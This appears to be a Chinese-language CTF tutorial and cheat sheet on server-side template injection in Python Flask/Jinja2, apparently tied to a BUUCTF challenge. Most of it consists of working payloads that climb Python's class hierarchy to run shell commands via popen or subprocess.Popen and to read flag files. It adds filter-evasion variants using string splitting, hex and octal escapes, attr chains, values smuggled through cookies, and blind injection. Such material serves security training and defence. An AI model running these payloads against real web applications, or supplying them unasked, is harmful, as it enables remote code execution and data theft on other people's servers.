SSTI

SSTI为模板注入，以下皆为 Python3 环境

首先由于模板解析的特性，当使用 render_template_string 则可以通过各个类之间的调用造成命令执行

render_template_string("{{1+1}}")

这一解析方法时就会把输入的内容直接放入页面解析，通常的检测方法为

{{1+1}}

返回的是 2，这也说明其中的内容被执行。

而安全的方法是

render_template("{{1+1}}")

返回的是

{{1+1}}

利用方法

通常是通过某一对象向上寻找基类，进而使用包含某些特殊方法的类，并调用其中的危险函数来执行命令

以下为 flask 的常见可用类

75 <class '_frozen_importlib._ModuleLock'>
76 <class '_frozen_importlib._DummyModuleLock'>
77 <class '_frozen_importlib._ModuleLockManager'>
78 <class '_frozen_importlib._installed_safely'>
79 <class '_frozen_importlib.ModuleSpec'>
91 <class '_frozen_importlib_external.FileLoader'>
92 <class '_frozen_importlib_external._NamespacePath'>
93 <class '_frozen_importlib_external._NamespaceLoader'>
95 <class '_frozen_importlib_external.FileFinder'>
103 <class 'codecs.IncrementalEncoder'>
104 <class 'codecs.IncrementalDecoder'>
105 <class 'codecs.StreamReaderWriter'>
106 <class 'codecs.StreamRecoder'>
128 <class 'os._wrap_close'>
129 <class '_sitebuiltins.Quitter'>
130 <class '_sitebuiltins._Printer'>

当确定存在模板注入后就是先寻找可用类

{{''.__class__.__mro__[1].__subclasses__()}}

__class__ 返回调用的参数类型
__mro__ 此属性是在方法解析期间寻找基类时考虑的类元组
__subclasses__() 返回object的子类

class 返回 str 类，str的基类是 object类，之后返回object的子类，就可以实现多种方法

例如命令执行：

{{''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("ls").read()')}}

文件读取：

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/this_is_the_flag.txt').read()}}

WAF绕过

很多 Python 中的语法在 SSTI 中也都是可以用的

attr 用于获取变量，以下写法是相同的

""|attr("__class__")
"".__class__

获取数组参数可以使用

__gititem__()
__gititem__(数组下标)
__gititem__("key")

绕过双引号可以使用

request.cookies.参数名
request.args.参数名

比如通过 + 进行拼接绕过关键字，也可以使用 “” 进行拼接，或者 "str1".__add__("str2") 的方式

{{''.__class__.__mro__[1].__subclasses__()[75].__init__.__globals__['__buil'+'tins__']['ev'+'al']('__imp'+'ort__("o'+'s").pop'+'en("ls").read()')}}
{{[].__class__.__base__.__subclasses__()[75].__init__.__globals__.__builtins__["open"]("/fl""ag").read()}}
{{app.__init__.__globals__["__buil".__add__("tins__")].open("/fla".__add__("g")).read()}}

通过十六进制绕过 . 和 _

{{''["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[342]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["\x5f\x5fimport\x5f\x5f"]('os')["popen"]("ls")["read"]()}}

或者在无回显的时候进行盲注 177 threading.Semaphore

{% if ''.__class__.__mro__[-1].__subclasses__()[177].__init__.__globals__['__bui'+'ltins__']['open']('/app/flag').read()[0:1]=='f' %}xxx{% endif %}

也有特殊的可用类 <class 'subprocess.Popen'> 直接执行命令

{{''.__class__.__mro__[-1].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}

或者利用 getattr 进行沙箱逃逸

getattr(getattr(getattr(getattr(getattr(getattr(getattr([],'__cla'+'ss__'),'__mr'+'o__')[1],'__subclas'+'ses__')()[104],'__init__'),'__glob'+'al'+'s__')['sy'+'s'],'mod'+'ules')['o'+'s'],'sy'+'ste'+'m')('l'+'s')

和利用八进制绕过

{%print%0a(lipsum|attr("\137\137\147\154\157\142\141\154\163\137\137"))|attr("\137\137\147\145\164\151\164\145\155\137\137")("\137\137\142\165\151\154\164\151\156\163\137\137")|attr("\137\137\147\145\164\151\164\145\155\137\137")("\145\166\141\154")("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\160\157\160\145\156\50\47\143\141\164\40\57\146\154\141\147\47\51\56\162\145\141\144\50\51")%}

利用 attr 和 request 绕过

{{()|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3)()|attr(request.cookies.x4)(78)|attr(request.cookies.x5)|attr(request.cookies.x6)|attr(request.cookies.x4)(request.cookies.x7)|attr(request.cookies.x4)(request.cookies.x9)(request.cookies.x10)}}
Cookie: x1=__class__; x2=__base__; x3=__subclasses__; x4=__getitem__; x5=__init__; x6=__globals__; x7=__builtins__; x8=__getitem__; x9=eval; x10=__import__("os").popen("cat flag.txt").read();

其他方法

查看对象属性

(对象名).func_globals  
(对象名).__code__.co_consts 
(对象名).__code__.co_names
(对象名).__dict__
(对象名).__globals__

相关题目

BUUCTF [BJDCTF 2nd]fake google